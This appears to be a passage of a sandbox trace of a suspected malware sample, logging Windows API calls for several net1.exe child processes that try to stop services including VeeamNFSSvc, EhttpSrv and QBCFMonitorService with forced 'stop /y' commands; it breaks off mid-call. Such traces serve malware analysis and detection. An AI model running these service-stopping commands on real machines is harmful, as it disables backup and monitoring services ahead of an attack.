_wcsicmp (_String1="messenger", _String2="VEEAMNFSSVC") returned -9 [0106.429] _wcsicmp (_String1="receiver", _String2="VEEAMNFSSVC") returned -4 [0106.429] _wcsicmp (_String1="rcv", _String2="VEEAMNFSSVC") returned -4 [0106.429] _wcsicmp (_String1="redirector", _String2="VEEAMNFSSVC") returned -4 [0106.429] _wcsicmp (_String1="redir", _String2="VEEAMNFSSVC") returned -4 [0106.429] _wcsicmp (_String1="rdr", _String2="VEEAMNFSSVC") returned -4 [0106.429] _wcsicmp (_String1="workstation", _String2="VEEAMNFSSVC") returned 1 [0106.429] _wcsicmp (_String1="work", _String2="VEEAMNFSSVC") returned 1 [0106.429] _wcsicmp (_String1="wksta", _String2="VEEAMNFSSVC") returned 1 [0106.429] _wcsicmp (_String1="prdr", _String2="VEEAMNFSSVC") returned -6 [0106.429] _wcsicmp (_String1="devrdr", _String2="VEEAMNFSSVC") returned -18 [0106.429] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMNFSSVC") returned -10 [0106.429] _wcsicmp (_String1="server", _String2="VEEAMNFSSVC") returned -3 [0106.429] _wcsicmp (_String1="svr", _String2="VEEAMNFSSVC") returned -3 [0106.429] _wcsicmp (_String1="srv", _String2="VEEAMNFSSVC") returned -3 [0106.429] _wcsicmp (_String1="lanmanserver", _String2="VEEAMNFSSVC") returned -10 [0106.429] _wcsicmp (_String1="alerter", _String2="VEEAMNFSSVC") returned -21 [0106.429] _wcsicmp (_String1="netlogon", _String2="VEEAMNFSSVC") returned -8 [0106.429] NetServiceControl (in: servername=0x0, service="VEEAMNFSSVC", opcode=0x0, arg=0x0, bufptr=0x29fe44 | out: bufptr=0x29fe44) returned 0x889 [0106.430] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0106.430] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0106.431] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0106.431] GetFileType (hFile=0x0) returned 0x0 [0106.431] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6a3ec8 [0106.431] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6a3ec8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0106.432] WriteFile (in: hFile=0x0, lpBuffer=0x6a3ec8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29fd84, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fd84, lpOverlapped=0x0) returned 0 [0106.432] LocalFree (hMem=0x6a3ec8) returned 0x0 [0106.432] GetFileType (hFile=0x0) returned 0x0 [0106.432] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6a6170 [0106.432] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6a6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nj", lpUsedDefaultChar=0x0) returned 2 [0106.432] WriteFile (in: hFile=0x0, lpBuffer=0x6a6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29fd84, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fd84, lpOverlapped=0x0) returned 0 [0106.432] LocalFree (hMem=0x6a6170) returned 0x0 [0106.432] _ultow (in: _Dest=0x889, _Radix=2751924 | out: _Dest=0x889) returned="2185" [0106.432] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0106.432] GetFileType (hFile=0x0) returned 0x0 [0106.432] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6a6170 [0106.432] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6a6170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0106.432] WriteFile (in: hFile=0x0, lpBuffer=0x6a6170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x29fd90, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fd90, lpOverlapped=0x0) returned 0 [0106.432] LocalFree (hMem=0x6a6170) returned 0x0 [0106.432] GetFileType (hFile=0x0) returned 0x0 [0106.432] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6a6170 [0106.432] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6a6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nj", lpUsedDefaultChar=0x0) returned 2 [0106.432] WriteFile (in: hFile=0x0, lpBuffer=0x6a6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29fd90, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fd90, lpOverlapped=0x0) returned 0 [0106.432] LocalFree (hMem=0x6a6170) returned 0x0 [0106.433] NetApiBufferFree (Buffer=0x6a1ae0) returned 0x0 [0106.433] NetApiBufferFree (Buffer=0x6a1af8) returned 0x0 [0106.433] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamNFSSvc /y" [0106.433] exit (_Code=2) Process: id = "145" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x2329f000" os_pid = "0xfe4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "43" os_parent_pid = "0xc58" cmd_line = "C:\\Windows\\system32\\net1 stop EhttpSrv /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 519 os_tid = 0x320 [0106.929] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x14c193b0, dwHighDateTime=0x1d6f0d1)) [0106.929] GetCurrentProcessId () returned 0xfe4 [0106.929] GetCurrentThreadId () returned 0x320 [0106.929] GetTickCount () returned 0x114e9c3 [0106.929] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=22602971934) returned 1 [0106.929] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0106.929] __set_app_type (_Type=0x1) [0106.929] __p__fmode () returned 0x770331f4 [0106.929] __p__commode () returned 0x770331fc [0106.929] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0106.930] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0106.930] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.930] GetConsoleOutputCP () returned 0x1b5 [0106.930] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0106.930] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.933] sprintf_s (in: _DstBuf=0x12ff34, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0106.933] setlocale (category=0, locale=".437") returned="English_United States.437" [0106.934] GetStdHandle (nStdHandle=0xfffffff5) returned 0x40c [0106.935] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.935] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EhttpSrv /y" [0106.935] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fd00, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0106.935] RtlAllocateHeap (HeapHandle=0x230000, Flags=0x0, Size=0x64) returned 0x243ad8 [0106.935] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0106.935] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12ff04 | out: Buffer=0x12ff04*=0x241ae0) returned 0x0 [0106.935] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12ff04 | out: Buffer=0x12ff04*=0x241af8) returned 0x0 [0106.935] _fileno (_File=0x77032900) returned -2 [0106.935] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0106.935] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0106.935] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0106.997] _wcsicmp (_String1="config", _String2="stop") returned -16 [0106.997] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0106.997] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0106.997] _wcsicmp (_String1="file", _String2="stop") returned -13 [0106.997] _wcsicmp (_String1="files", _String2="stop") returned -13 [0106.997] _wcsicmp (_String1="group", _String2="stop") returned -12 [0106.997] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0106.998] _wcsicmp (_String1="help", _String2="stop") returned -11 [0106.998] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0106.998] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0106.998] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0106.998] _wcsicmp (_String1="session", _String2="stop") returned -15 [0106.998] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0106.998] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0106.998] _wcsicmp (_String1="share", _String2="stop") returned -12 [0106.998] _wcsicmp (_String1="start", _String2="stop") returned -14 [0106.998] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0106.998] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0106.998] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0106.998] _wcsicmp (_String1="accounts", _String2="EhttpSrv") returned -4 [0106.998] _wcsicmp (_String1="computer", _String2="EhttpSrv") returned -2 [0106.998] _wcsicmp (_String1="config", _String2="EhttpSrv") returned -2 [0106.998] _wcsicmp (_String1="continue", _String2="EhttpSrv") returned -2 [0106.998] _wcsicmp (_String1="cont", _String2="EhttpSrv") returned -2 [0106.998] _wcsicmp (_String1="file", _String2="EhttpSrv") returned 1 [0106.998] _wcsicmp (_String1="files", _String2="EhttpSrv") returned 1 [0106.998] _wcsicmp (_String1="group", _String2="EhttpSrv") returned 2 [0106.998] _wcsicmp (_String1="groups", _String2="EhttpSrv") returned 2 [0106.998] _wcsicmp (_String1="help", _String2="EhttpSrv") returned 3 [0106.998] _wcsicmp (_String1="helpmsg", _String2="EhttpSrv") returned 3 [0106.998] _wcsicmp (_String1="localgroup", _String2="EhttpSrv") returned 7 [0106.998] _wcsicmp (_String1="pause", _String2="EhttpSrv") returned 11 [0106.998] _wcsicmp (_String1="session", _String2="EhttpSrv") returned 14 [0106.998] _wcsicmp (_String1="sessions", _String2="EhttpSrv") returned 14 [0106.998] _wcsicmp (_String1="sess", _String2="EhttpSrv") returned 14 [0106.998] _wcsicmp (_String1="share", _String2="EhttpSrv") returned 14 [0106.998] _wcsicmp (_String1="start", _String2="EhttpSrv") returned 14 [0106.998] _wcsicmp (_String1="stats", _String2="EhttpSrv") returned 14 [0106.998] _wcsicmp (_String1="statistics", _String2="EhttpSrv") returned 14 [0106.999] _wcsicmp (_String1="stop", _String2="EhttpSrv") returned 14 [0106.999] _wcsicmp (_String1="time", _String2="EhttpSrv") returned 15 [0106.999] _wcsicmp (_String1="user", _String2="EhttpSrv") returned 16 [0106.999] _wcsicmp (_String1="users", _String2="EhttpSrv") returned 16 [0106.999] _wcsicmp (_String1="msg", _String2="EhttpSrv") returned 8 [0106.999] _wcsicmp (_String1="messenger", _String2="EhttpSrv") returned 8 [0106.999] _wcsicmp (_String1="receiver", _String2="EhttpSrv") returned 13 [0106.999] _wcsicmp (_String1="rcv", _String2="EhttpSrv") returned 13 [0106.999] _wcsicmp (_String1="netpopup", _String2="EhttpSrv") returned 9 [0106.999] _wcsicmp (_String1="redirector", _String2="EhttpSrv") returned 13 [0106.999] _wcsicmp (_String1="redir", _String2="EhttpSrv") returned 13 [0106.999] _wcsicmp (_String1="rdr", _String2="EhttpSrv") returned 13 [0106.999] _wcsicmp (_String1="workstation", _String2="EhttpSrv") returned 18 [0106.999] _wcsicmp (_String1="work", _String2="EhttpSrv") returned 18 [0106.999] _wcsicmp (_String1="wksta", _String2="EhttpSrv") returned 18 [0106.999] _wcsicmp (_String1="prdr", _String2="EhttpSrv") returned 11 [0106.999] _wcsicmp (_String1="devrdr", _String2="EhttpSrv") returned -1 [0106.999] _wcsicmp (_String1="lanmanworkstation", _String2="EhttpSrv") returned 7 [0106.999] _wcsicmp (_String1="server", _String2="EhttpSrv") returned 14 [0106.999] _wcsicmp (_String1="svr", _String2="EhttpSrv") returned 14 [0106.999] _wcsicmp (_String1="srv", _String2="EhttpSrv") returned 14 [0106.999] _wcsicmp (_String1="lanmanserver", _String2="EhttpSrv") returned 7 [0106.999] _wcsicmp (_String1="alerter", _String2="EhttpSrv") returned -4 [0106.999] _wcsicmp (_String1="netlogon", _String2="EhttpSrv") returned 9 [0106.999] _wcsupr (in: _String="EhttpSrv" | out: _String="EHTTPSRV") returned="EHTTPSRV" [0107.000] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2454a8 [0107.002] GetServiceKeyNameW (in: hSCManager=0x2454a8, lpDisplayName="EHTTPSRV", lpServiceName=0x3faaf0, lpcchBuffer=0x12fea0 | out: lpServiceName="", lpcchBuffer=0x12fea0) returned 0 [0107.003] _wcsicmp (_String1="msg", _String2="EHTTPSRV") returned 8 [0107.003] _wcsicmp (_String1="messenger", _String2="EHTTPSRV") returned 8 [0107.003] _wcsicmp (_String1="receiver", _String2="EHTTPSRV") returned 13 [0107.003] _wcsicmp (_String1="rcv", _String2="EHTTPSRV") returned 13 [0107.003] _wcsicmp (_String1="redirector", _String2="EHTTPSRV") returned 13 [0107.003] _wcsicmp (_String1="redir", _String2="EHTTPSRV") returned 13 [0107.003] _wcsicmp (_String1="rdr", _String2="EHTTPSRV") returned 13 [0107.003] _wcsicmp (_String1="workstation", _String2="EHTTPSRV") returned 18 [0107.003] _wcsicmp (_String1="work", _String2="EHTTPSRV") returned 18 [0107.003] _wcsicmp (_String1="wksta", _String2="EHTTPSRV") returned 18 [0107.003] _wcsicmp (_String1="prdr", _String2="EHTTPSRV") returned 11 [0107.003] _wcsicmp (_String1="devrdr", _String2="EHTTPSRV") returned -1 [0107.003] _wcsicmp (_String1="lanmanworkstation", _String2="EHTTPSRV") returned 7 [0107.003] _wcsicmp (_String1="server", _String2="EHTTPSRV") returned 14 [0107.003] _wcsicmp (_String1="svr", _String2="EHTTPSRV") returned 14 [0107.003] _wcsicmp (_String1="srv", _String2="EHTTPSRV") returned 14 [0107.003] _wcsicmp (_String1="lanmanserver", _String2="EHTTPSRV") returned 7 [0107.003] _wcsicmp (_String1="alerter", _String2="EHTTPSRV") returned -4 [0107.003] _wcsicmp (_String1="netlogon", _String2="EHTTPSRV") returned 9 [0107.003] NetServiceControl (in: servername=0x0, service="EHTTPSRV", opcode=0x0, arg=0x0, bufptr=0x12fe9c | out: bufptr=0x12fe9c) returned 0x889 [0107.004] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.004] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0107.005] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.005] GetFileType (hFile=0x0) returned 0x0 [0107.005] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x243ec0 [0107.005] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x243ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0107.005] WriteFile (in: hFile=0x0, lpBuffer=0x243ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x12fddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fddc, lpOverlapped=0x0) returned 0 [0107.005] LocalFree (hMem=0x243ec0) returned 0x0 [0107.005] GetFileType (hFile=0x0) returned 0x0 [0107.005] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x246170 [0107.006] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x246170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n$", lpUsedDefaultChar=0x0) returned 2 [0107.006] WriteFile (in: hFile=0x0, lpBuffer=0x246170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12fddc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fddc, lpOverlapped=0x0) returned 0 [0107.006] LocalFree (hMem=0x246170) returned 0x0 [0107.006] _ultow (in: _Dest=0x889, _Radix=1244684 | out: _Dest=0x889) returned="2185" [0107.006] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.006] GetFileType (hFile=0x0) returned 0x0 [0107.006] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x246170 [0107.006] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x246170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0107.006] WriteFile (in: hFile=0x0, lpBuffer=0x246170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x12fde8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fde8, lpOverlapped=0x0) returned 0 [0107.006] LocalFree (hMem=0x246170) returned 0x0 [0107.006] GetFileType (hFile=0x0) returned 0x0 [0107.006] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x246170 [0107.006] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x246170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n$", lpUsedDefaultChar=0x0) returned 2 [0107.006] WriteFile (in: hFile=0x0, lpBuffer=0x246170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12fde8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fde8, lpOverlapped=0x0) returned 0 [0107.006] LocalFree (hMem=0x246170) returned 0x0 [0107.006] NetApiBufferFree (Buffer=0x241ae0) returned 0x0 [0107.006] NetApiBufferFree (Buffer=0x241af8) returned 0x0 [0107.006] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EhttpSrv /y" [0107.007] exit (_Code=2) Process: id = "146" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x22a33000" os_pid = "0xf04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x90" cmd_line = "C:\\Windows\\system32\\net1 stop QBCFMonitorService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 520 os_tid = 0xfd0 [0107.009] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fcac | out: lpSystemTimeAsFileTime=0x18fcac*(dwLowDateTime=0x14cd7a90, dwHighDateTime=0x1d6f0d1)) [0107.009] GetCurrentProcessId () returned 0xf04 [0107.009] GetCurrentThreadId () returned 0xfd0 [0107.009] GetTickCount () returned 0x114ea11 [0107.009] QueryPerformanceCounter (in: lpPerformanceCount=0x18fca4 | out: lpPerformanceCount=0x18fca4*=22610983050) returned 1 [0107.009] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0107.009] __set_app_type (_Type=0x1) [0107.009] __p__fmode () returned 0x770331f4 [0107.009] __p__commode () returned 0x770331fc [0107.009] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0107.010] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0107.010] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.010] GetConsoleOutputCP () returned 0x1b5 [0107.010] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0107.010] SetThreadUILanguage (LangId=0x0) returned 0x409 [0107.013] sprintf_s (in: _DstBuf=0x18fc64, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.013] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.015] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2fc [0107.015] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0107.015] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop QBCFMonitorService /y" [0107.015] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fa30, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0107.015] RtlAllocateHeap (HeapHandle=0x7f0000, Flags=0x0, Size=0x78) returned 0x7ff658 [0107.015] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.015] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fc34 | out: Buffer=0x18fc34*=0x801af8) returned 0x0 [0107.015] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fc34 | out: Buffer=0x18fc34*=0x801b10) returned 0x0 [0107.015] _fileno (_File=0x77032900) returned -2 [0107.015] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0107.015] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.015] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.015] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.015] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.015] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.015] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.015] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.015] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.016] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.016] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.016] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.016] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.016] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.016] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.016] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.016] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.016] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.016] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.016] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.016] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.016] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.016] _wcsicmp (_String1="accounts", _String2="QBCFMonitorService") returned -16 [0107.016] _wcsicmp (_String1="computer", _String2="QBCFMonitorService") returned -14 [0107.016] _wcsicmp (_String1="config", _String2="QBCFMonitorService") returned -14 [0107.016] _wcsicmp (_String1="continue", _String2="QBCFMonitorService") returned -14 [0107.016] _wcsicmp (_String1="cont", _String2="QBCFMonitorService") returned -14 [0107.016] _wcsicmp (_String1="file", _String2="QBCFMonitorService") returned -11 [0107.016] _wcsicmp (_String1="files", _String2="QBCFMonitorService") returned -11 [0107.016] _wcsicmp (_String1="group", _String2="QBCFMonitorService") returned -10 [0107.016] _wcsicmp (_String1="groups", _String2="QBCFMonitorService") returned -10 [0107.016] _wcsicmp (_String1="help", _String2="QBCFMonitorService") returned -9 [0107.016] _wcsicmp (_String1="helpmsg", _String2="QBCFMonitorService") returned -9 [0107.016] _wcsicmp (_String1="localgroup", _String2="QBCFMonitorService") returned -5 [0107.016] _wcsicmp (_String1="pause", _String2="QBCFMonitorService") returned -1 [0107.016] _wcsicmp (_String1="session", _String2="QBCFMonitorService") returned 2 [0107.016] _wcsicmp (_String1="sessions", _String2="QBCFMonitorService") returned 2 [0107.016] _wcsicmp (_String1="sess", _String2="QBCFMonitorService") returned 2 [0107.016] _wcsicmp (_String1="share", _String2="QBCFMonitorService") returned 2 [0107.016] _wcsicmp (_String1="start", _String2="QBCFMonitorService") returned 2 [0107.016] _wcsicmp (_String1="stats", _String2="QBCFMonitorService") returned 2 [0107.016] _wcsicmp (_String1="statistics", _String2="QBCFMonitorService") returned 2 [0107.016] _wcsicmp (_String1="stop", _String2="QBCFMonitorService") returned 2 [0107.016] _wcsicmp (_String1="time", _String2="QBCFMonitorService") returned 3 [0107.016] _wcsicmp (_String1="user", _String2="QBCFMonitorService") returned 4 [0107.017] _wcsicmp (_String1="users", _String2="QBCFMonitorService") returned 4 [0107.017] _wcsicmp (_String1="msg", _String2="QBCFMonitorService") returned -4 [0107.017] _wcsicmp (_String1="messenger", _String2="QBCFMonitorService") returned -4 [0107.017] _wcsicmp (_String1="receiver", _String2="QBCFMonitorService") returned 1 [0107.017] _wcsicmp (_String1="rcv", _String2="QBCFMonitorService") returned 1 [0107.017] _wcsicmp (_String1="netpopup", _String2="QBCFMonitorService") returned -3 [0107.017] _wcsicmp (_String1="redirector", _String2="QBCFMonitorService") returned 1 [0107.017] _wcsicmp (_String1="redir", _String2="QBCFMonitorService") returned 1 [0107.017] _wcsicmp (_String1="rdr", _String2="QBCFMonitorService") returned 1 [0107.017] _wcsicmp (_String1="workstation", _String2="QBCFMonitorService") returned 6 [0107.017] _wcsicmp (_String1="work", _String2="QBCFMonitorService") returned 6 [0107.017] _wcsicmp (_String1="wksta", _String2="QBCFMonitorService") returned 6 [0107.017] _wcsicmp (_String1="prdr", _String2="QBCFMonitorService") returned -1 [0107.017] _wcsicmp (_String1="devrdr", _String2="QBCFMonitorService") returned -13 [0107.017] _wcsicmp (_String1="lanmanworkstation", _String2="QBCFMonitorService") returned -5 [0107.017] _wcsicmp (_String1="server", _String2="QBCFMonitorService") returned 2 [0107.017] _wcsicmp (_String1="svr", _String2="QBCFMonitorService") returned 2 [0107.017] _wcsicmp (_String1="srv", _String2="QBCFMonitorService") returned 2 [0107.017] _wcsicmp (_String1="lanmanserver", _String2="QBCFMonitorService") returned -5 [0107.017] _wcsicmp (_String1="alerter", _String2="QBCFMonitorService") returned -16 [0107.017] _wcsicmp (_String1="netlogon", _String2="QBCFMonitorService") returned -3 [0107.017] _wcsupr (in: _String="QBCFMonitorService" | out: _String="QBCFMONITORSERVICE") returned="QBCFMONITORSERVICE" [0107.017] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x805448 [0107.020] GetServiceKeyNameW (in: hSCManager=0x805448, lpDisplayName="QBCFMONITORSERVICE", 